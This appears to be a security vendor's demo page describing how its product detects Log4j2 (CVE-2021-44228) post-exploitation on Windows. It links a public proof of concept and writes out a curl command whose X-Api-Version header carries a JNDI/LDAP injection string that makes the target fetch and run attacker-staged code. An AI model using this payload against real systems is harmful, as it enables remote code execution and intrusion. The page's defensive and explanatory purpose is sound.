SentinelOne vs Apache Log4j2 (CVE-2021-44228) – Windows
Watch SentinelOne protect against the Log4j2 post-exploitation attempts. In this Windows demo, we used a publicly available POC with a weaponized malicious PowerShell script as the post-exploit payload. Read more on our blog to learn more and stay protected.
Spotted exploit attempts in the wild thus far have led to commodity crypto miner payloads or other known and commodity post-exploitation methods. SentinelOne expects further opportunistic abuse by a wide variety of attackers, including ransomware and nation-state actors.
Potential attack vectors that are covered by the Singularity XDR platform include various post-exploitation frameworks such as Cobaltstrike, Empire, Metasploit, and usage of post-exploitation tools such as Mimikatz and Bloodhound as well as ransomware attacks and cryptominer activity.
PoC Reference: https://archive.org/details/github.com-tangxiaofeng7-CVE-2021-44228-Apache-Log4j-Rce_-_2021-12-11_07-40-15
The PoC used in the SentinelOne video is based on the above PoC. This same code can be used to spawn a variety of code on the targeted endpoint. In this case, we utilized a malicious PowerShell script (launched via .bat)
The tangxiaofeng7 (public) proof-of-concept code is utilized to stage the ‘malicious’ LDAP environment and respond to the appropriate client queries/traffic.
The exploit is delivered to the target host via CURL
curl 192.168.xxx.xxx:8080 -H ‘X-Api-Version: ${jndi:ldap://192.168.xxx.xxx:1389/STRING}’
With the LDAP destination nested in the CURL url, the target host will reach out to the attack server, resulting in the attacker’s staged code being executed (in the case of this demo (explorer.exe c:temprun.bat)
Watch our Linux demo here: https://youtu.be/vkboEtF0bAg